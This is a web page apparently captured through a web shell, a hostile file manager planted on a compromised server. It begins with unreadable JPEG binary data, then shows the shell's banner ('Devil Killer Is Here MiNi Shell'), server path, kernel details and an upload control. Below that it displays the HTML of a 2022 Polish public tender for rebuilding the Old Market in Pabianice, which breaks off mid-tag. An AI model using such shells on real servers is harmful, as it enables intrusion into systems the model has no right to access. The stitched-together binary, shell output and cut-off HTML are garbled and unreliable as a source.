JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220329/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220329/0010236001-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa Starego Rynku w Pabianicach – tworzenie włączającej, inspirującej i aktywizującej mieszkańców zielonej przestrzeni publicznej </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Miejska Pabianice reprezentowana przez Prezydenta Miasta Pabianic Grzegorza Mackiewicza</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 472057715</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Zamkowa 16</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Pabianice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">95-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL712 - Łódzki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">poczta@um.pabianice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.bip.um.pabianice.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa Starego Rynku w Pabianicach – tworzenie włączającej, inspirującej i aktywizującej mieszkańców zielonej przestrzeni publicznej </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-013d50b7-af51-11ec-80f8-1ad70aec7fa4</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00102360</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-03-29</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00020888/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Przebudowa Starego Rynku w Pabianicach tworzenie włączającej, inspiracji i aktywującej mieszkańców zielonej przestrzeni publicznej</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://www.bip.um.pabianice.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://www.bip.um.pabianice.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W postępowaniu komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu<br/>miniPortalu (dostępny jest pod adresem: https://miniportal.uzp.gov.pl), ePUAPu (dostępny pod<br/>adresem: https://epuap.gov.pl/wps/portal), poczty elektronicznej. Zamawiający wyznacza do kontaktu z<br/>Wykonawcami - w kwestiach formalnych Edyta Fila-Wyleżych- kierownik Referatu Zamówień Publicznych e-mail: zamowienia.publiczne@um.pabianice.pl, w kwestiach merytorycznych Malwina<br/>Sawosz- Referat Inwestycji e-mail: m.sawosz@um.pabianice.pl. Wykonawca zamierzający wziąć udział w postępowaniu musi posiadać konto na ePUAP i wtedy ma dostęp do<br/>„Formularza do złożenia, zmiany, wycofania oferty lub wniosku” oraz do „Formularza do komunikacji”.<br/>Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych,<br/>elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu<br/>opisane są w Regulaminie korzystania z systemu miniPortal oraz Warunkach korzystania z<br/>elektronicznej platformy usług administracji publicznej (ePUAP). Zasady składania ofert oraz<br/>dokumentów składanych wraz z ofertą oraz wymagania techniczne i organizacyjne ich wysyłania<br/>opisane są w Instrukcji użytkownika. W celu korzystania z systemu miniPortal konieczne jest<br/>dysponowanie przez użytkownika urządzeniem teleinformatycznym z dostępem do sieci Internet.<br/>Szczegóły w SWZ w rozdziale 11 w szczególności pkt 11.4- 11-6. Link do postępowania i jego ID są w<br/>załączniku nr 9 do SWZ. Dane postępowanie też na Liście wszystkich postępowań w miniPortalu,<br/>klikając opcję „Dla Wykonawców” lub ze strony głównej z zakładki Postępowania.<br/>Wykonawca składa ofertę za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub<br/>wniosku” dostępnego<br/>na ePUAP i udostępnionego również na miniPortalu.Funkcjonalność do zaszyfrowania oferty przez<br/>Wykonawcę jest dostępna dla wykonawców na miniPortalu, w szczegółach danego postępowania. W<br/>formularzu oferty Wykonawca zobowiązany jest podać adres skrzynki ePUAP, na którym prowadzona<br/>będzie korespondencja związana z postępowaniem. Ofertę w języku polskim składa się, pod rygorem<br/>nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub<br/>podpisem osobistym. Sposób złożenia oferty, w tym zaszyfrowania oferty opisany jest w „Instrukcji<br/>użytkownika”, dostępnej na stronie: https://miniportal.uzp.gov.pl<br/>Z uwagi na ograniczoną liczbę znaków w tym ogłoszeniu więcej informacji w dalszej części ogłoszenia</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych)(Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje, że:<br/>1) Jest administratorem danych osobowych Wykonawcy oraz osób, których dane Wykonawca<br/>przekazał w niniejszym postępowaniu;<br/>2) dane osobowe Wykonawcy przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu<br/>związanym z postępowaniem o udzielenie zamówienia publicznego na „Przebudowa Starego Rynku w Pabianicach – tworzenie włączającej, inspirującej i aktywizującej mieszkańców zielonej przestrzeni publicznej” prowadzonym w trybie<br/>podstawowym;<br/>3) odbiorcami danych osobowych Wykonawcy będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 8 oraz art. 96 ust. 3 ustawy z dnia 29 stycznia 2004 r. –<br/>Prawo zamówień publicznych(Dz. U. z 2019 r. poz. 2019 z późn. zm.),dalej „ustawa Pzp”;<br/>4) dane osobowe Wykonawcy będą przechowywane, zgodnie z art. 97 ust. 1<br/>ustawy Pzp,przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas<br/>trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>5)obowiązek podania przez Wykonawcę danych osobowych bezpośrednio go dotyczących jest<br/>wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z<br/>ustawy Pzp;<br/>6) w odniesieniu do danych osobowych Wykonawcy decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 RODO;<br/>7) Wykonawca posiada:− na podstawie art. 15 RODO prawo dostępu do danych osobowych<br/>dotyczących Wykonawcy;− na podstawie art. 16 RODO prawo<br/>do sprostowania danych osobowych, o ile ich zmiana nie skutkuje zmianą wyniku postępowania o<br/>udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą<br/>Pzp oraz nie narusza integralności protokołu oraz jego załączników;− na podstawie art. 18 RODO<br/>prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO;− prawo do wniesienia skargi do Prezesa Urzędu<br/>Ochrony Danych Osobowych, gdy Wykonawca uzna, że przetwarzanie jego danych osobowych<br/>narusza przepisy RODO;<br/>8) Wykonawcy nie przysługuje:− w związku z art. 17 ust. 3 lit. b, d lub e<br/>RODO prawo do usunięcia danych osobowych;− prawo do przenoszenia danych osobowych, o którym<br/>mowa w art. 20 RODO;− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych<br/>osobowych, gdyż podstawą prawną przetwarzania danych osobowych Wykonawcy jest art. 6 ust. 1 lit. c<br/>RODO.Szczegółowe informacje dostępne są w Rozdziale 22 swz.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">W przypadku, gdy wykonanie obowiązków, o których<br/>mowaw art. 15 ust. 1-3 rozporządzenia 2016/679, wymagałoby niewspółmiernie dużego<br/>wysiłku,Zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji<br/>mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o<br/>udzielenie zamówienia publicznego lub konkursu.Skorzystanie przez osobę, której dane dotyczą, z<br/>uprawnienia do sprostowania lub uzupełnienia danych osobowych, o którym mowa w art. 16<br/>rozporządzenia2016/679, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia<br/>publicznego lub konkursu ani zmianą postanowień umowy w zakresie niezgodnym z<br/>ustawą.Wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 rozporządzenia 2016/679, nie<br/>ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia publicznego lub konkursu. W przypadku danych osobowych zamieszczonych przez<br/>Zamawiającego w Biuletynie Zamówień Publicznych, prawa, o których mowa w art. 15 i art. 16<br/>rozporządzenia 2016/679, są wykonywane w drodze żądania skierowanego do Zamawiającego.<br/>Szczegółowe informacje w rozdziale 22 SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.1.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 5284552,85 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 4.1. Przedmiotem zamówienia obejmującego realizację robót budowlano – instalacyjnych<br/>związanych z przebudową i rewitalizacją przestrzeni „Starego Rynku” - realizowanego w<br/>systemie „zaprojektuj i wybuduj” jest:<br/>a) opracowanie - na podstawie udostępnionej przez Zamawiającego koncepcji oraz Programu<br/>Funkcjonalno – Użytkowego - niezbędnej do realizacji przedsięwzięcia dokumentacji<br/>projektowo – kosztorysowej obejmującej wszystkie zakresy realizacji przedsięwzięcia, tj.:<br/>zakres I - Stary Rynek,<br/>zakres II - droga południowa,<br/>zakres III - droga wschodnia,<br/>zakres IV - teren przy Pomniku Niepodległości,<br/>zakres V - teren przy Kościele pw. św. Mateusza i Wawrzyńca,<br/>i zgodnej z zawartym w PFU opisem wraz z uzyskaniem niezbędnych decyzji<br/>administracyjnych umożliwiających realizację prac w zgodzie z przepisami ustawy Prawo<br/>Budowlane,<br/>b) wykonanie robót budowlano – instalacyjnych wraz z urządzeniem zieleni obejmujących<br/>tylko:<br/>zakres I - Stary Rynek,<br/>zakres II - droga południowa,<br/>zakres III - droga wschodnia,<br/>w oparciu o opracowaną dokumentację projektowo – kosztorysową, zakończone<br/>przygotowaniem dokumentacji powykonawczej wraz z instrukcją użytkowania obiektu<br/>oraz listą serwisową zamontowanych urządzeń oraz czynnym wsparciem dla<br/>Zamawiającego w celu uzyskania przez Zamawiającego decyzji pozwolenia na<br/>użytkowanie.<br/>Uwaga – robót budowlano – instalacyjnych wynikających z zakresu:<br/>IV - teren przy Pomniku Niepodległości,<br/>V - teren przy Kościele pw. św. Mateusza i Wawrzyńca,<br/>nie należy uwzględniać w wycenie ofertowej.<br/>4.2. Dalsze uszczegółowienie opisu przedmiotu zamówienia zawiera załącznik nr 1 do specyfikacji<br/>warunków zamówienia. Wykonawca winien przygotowując ofertę analizować opis przedmiotu<br/>zamówienia, w tym zapisy specyfikacji warunków zamówienia, mając na uwadze treść PFU i<br/>załączone do niego dokumenty.<br/>4.4. Szczególne wymagania i wytyczne dla Wykonawcy.<br/>a) Wykonawca odpowiedzialny będzie za całokształt zamówienia, w tym za przebieg oraz<br/>terminowe wykonanie zamówienia, za jakość, zgodność z warunkami technicznymi i<br/>jakościowymi określonymi dla przedmiotu zamówienia;<br/>b) Wymagana jest należyta staranność przy realizacji zamówienia, rozumiana jako staranność<br/>profesjonalisty w działalności objętej przedmiotem niniejszego zamówienia; c) Spełnienie innych wymagań określonych we wzorze umowy oraz wynikających<br/>z obowiązujących przepisów prawa.<br/>d) Wykonawca powinien, o ile uzna to za konieczne, zapewnić swoim specjalistom wsparcie<br/>i pomoc techniczną ze strony innych specjalistów, którzy mogą być niezbędni do właściwego<br/>wykonania umowy (np. dodatkowi projektanci, kierownicy danej branży, uprawniony<br/>geodeta, radca prawny, ekspert hydrogeolog, geolog, specjalista ds. ppoż., inżynier<br/>materiałowy, specjalista ochrony placu budowy, administrator, itp.). Wykonawca uwzględni<br/>w ofercie każdą konieczność uzupełnienia zespołu specjalistów wynikającą z przepisów<br/>prawa, decyzji, uzgodnień i porozumień, które są niezbędne do kompleksowej realizacji<br/>zamówienia. Kompletne wynagrodzenie całego personelu oraz wszelkie koszty związane z<br/>obsługą muszą być zawarte w cenie oferty Wykonawcy.<br/>e) W przypadku kolizji z istniejącymi urządzeniami infrastruktury technicznej, należy<br/>zaprojektować i wykonać ich przebudowę lub zabezpieczenie.<br/>4.5. Rozwiązania równoważne.<br/>a) Program Funkcjonalno-Użytkowy może wskazywać dla niektórych materiałów i urządzeń<br/>znaki towarowe lub pochodzenie. Zamawiający zgodnie z art. 99 ustawy pzp dopuszcza<br/>składanie ofert równoważnych, a wszelkie towary określone w dokumentacji, pochodzące<br/>od konkretnych producentów, określają minimalne parametry jakościowe i cechy użytkowe,<br/>jakim muszą odpowiadać towary, aby spełnić wymagania stawiane przez Zamawiającego.<br/>Wykonawca analizując PFU powinien założyć, że każdemu odniesieniu, o którym mowa w<br/>art. 99 ust. 5 ustawy pzp użytemu w dokumentacji towarzyszy wyraz „lub równoważne&#34;.<br/>b) Poprzez zapis dot. minimalnych parametrów jakościowych wymagań Zamawiający rozumie<br/>wymagania towarów zawarte w ogólnie dostępnych źródłach, katalogach, stronach<br/>internetowych producentów. Operowanie przykładowymi nazwami producenta, ma jedynie<br/>na celu doprecyzowanie poziomu oczekiwań Zamawiającego w stosunku do określonego<br/>rozwiązania. Zamawiający przy opisie przedmiotu zamówienia wskazując oznaczenie<br/>konkretnego producenta (dostawcy) lub konkretny produkt, dopuszcza jednocześnie<br/>produkty równoważne o parametrach jakościowych i cechach użytkowych co najmniej na<br/>poziomie parametrów wskazanego produktu, uznając tym samym każdy produkt o<br/>wskazanych parametrach lub lepszych. Posługiwanie się nazwami producentów /<br/>produktów ma wyłącznie charakter przykładowy.<br/>c) Wykonawca, który zastosował produkt równoważny, ma obowiązek wskazać w swojej<br/>ofercie, jakie materiały lub urządzenia zostały zamienione, i określić, jakie materiały i<br/>urządzenia w ich miejsce proponuje, podając ich parametry techniczne.<br/>d) Zgodnie z art. 101 ust. 5 ustawy pzp Zamawiający dopuszcza zastosowanie przez<br/>Wykonawców rozwiązań równoważnych w stosunku do rozwiązań opisanych w SWZ.<br/>Wykonawca, który w ofercie powoła się na zastosowanie rozwiązań równoważnych<br/>opisywanych w SWZ, jest obowiązany wykazać, że oferowane przez niego roboty budowlane<br/>spełniają wymagania określone przez Zamawiającego.<br/>e) Wykonawca, który zastosuje urządzenia lub materiały równoważne będzie obowiązany<br/>wykazać w trakcie realizacji zamówienia, że zastosowane przez niego urządzenia i materiały<br/>spełniają wymagania określone przez Zamawiającego.<br/>f) Użycie w PFU wymogu posiadania certyfikatu wydanego przez jednostkę oceniającą<br/>zgodność lub sprawozdania z badań przeprowadzonych przez tę jednostkę jako środka<br/>dowodowego potwierdzającego zgodność z wymaganiami lub cechami określonymi w opisie<br/>przedmiotu zamówienia, kryteriach oceny ofert lub warunkach realizacji zamówienia<br/>oznacza, że Zamawiający akceptuje również certyfikaty wydane przez inne równoważne<br/>jednostki oceniające zgodność. Zamawiający akceptuje także inne odpowiednie środki<br/>dowodowe, w szczególności dokumentację techniczną producenta, w przypadku, gdy dany<br/>Wykonawca nie ma ani dostępu do certyfikatów lub sprawozdań z badań, ani możliwości ich<br/>uzyskania w odpowiednim terminie, o ile ten brak dostępu nie może być przypisany danemu<br/>Wykonawcy, oraz pod warunkiem że dany Wykonawca udowodni, że wykonywane przez<br/>niego roboty budowlane, dostawy lub usługi spełniają wymogi lub kryteria określone w<br/>opisie przedmiotu zamówienia, kryteriach oceny ofert lub warunkach realizacji zamówienia.<br/>g) Jeżeli w opisie przedmiotu zamówienia ujęto zapis wynikający z KNR lub KNNR wskazujący<br/>na konieczność wykorzystywania przy realizacji zamówienia konkretnego sprzętu o<br/>konkretnych parametrach Zamawiający dopuszcza używanie innego sprzętu o ile zapewni to<br/>osiągnięcie zakładanych parametrów projektowych i nie spowoduje ryzyka niezgodności<br/>wykonanych prac z dokumentacją techniczną.<br/>h) Poprzez zapis dotyczący minimalnych parametrów jakościowych w odniesieniu do<br/>materiału szkółkarskiego Zamawiający rozumie wymagania odpowiadające minimum<br/>„Zaleceniom jakościowym dla ozdobnego materiału szkółkarskiego” Związku Szkółkarzy<br/>Polskich.<br/>4.6. Wymagania dotyczące dostępności.<br/>Założenia dokumentacji projektowej, o której mowa w przedmiotowym rozdziale SWZ mają<br/>spełniać wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z<br/>przeznaczeniem dla wszystkich użytkowników zgodnie z przepisami ustawy Prawo budowlane<br/>i przepisami wykonawczymi.<br/>4.7. Gwarancja.<br/>Okres rękojmi na wykonane roboty budowlane oraz zamontowane urządzenia i materiały<br/>wynosi minimum 60 miesięcy. Minimalny okres gwarancji na wykonane roboty budowlane<br/>oraz zamontowane urządzenia i materiały wynosi 60 miesięcy liczone od dnia podpisania<br/>protokołu końcowego. Wydłużenie przez Wykonawcę okresu gwarancji jest jednym z<br/>elementów kryteriów oceny ofert, a Zamawiający informuje, że sposób punktacji za<br/>proponowany przez Wykonawcę okres gwarancji określony został w dalszej części specyfikacji<br/>warunków zamówienia (Rozdział 17 SWZ).<br/>Okres rękojmi na zieleń/nasadzony materiał szkółkarski wynosi 18 miesięcy od dnia odbioru<br/>końcowego.<br/>Udzielając gwarancji Wykonawca zapewnia bezpłatne czynności przeglądów gwarancyjnych w<br/>okresie udzielonej gwarancji na cały objęty nią przedmiot zamówienia, więc powinien te koszty<br/>uwzględnić w wynagrodzeniu. Przeglądy będą odbywały się minimum raz w roku, chyba, że<br/>gwarancja producenta danego materiału wymaga częstszych przeglądów gwarancyjnych.<br/>Przeglądy gwarancyjne zieleni prowadzone będą co pół roku licząc od dnia podpisania odbioru<br/>końcowego.<br/>4.8. Ubezpieczenie.<br/>Zamawiający wymaga, aby Wykonawca przez cały okres realizacji zamówienia dysponował<br/>aktualnym i opłaconym ubezpieczeniem od odpowiedzialności cywilnej na warunkach wskazanych we wzorze umowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</p> <p class="mb-0">45112710-5 - Roboty w zakresie kształtowania terenów zielonych</p> <p class="mb-0">45200000-9 - Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">71000000-8 - Usługi architektoniczne, budowlane, inżynieryjne i kontrolne</p> <p class="mb-0">71220000-6 - Usługi projektowania architektonicznego</p> <h3 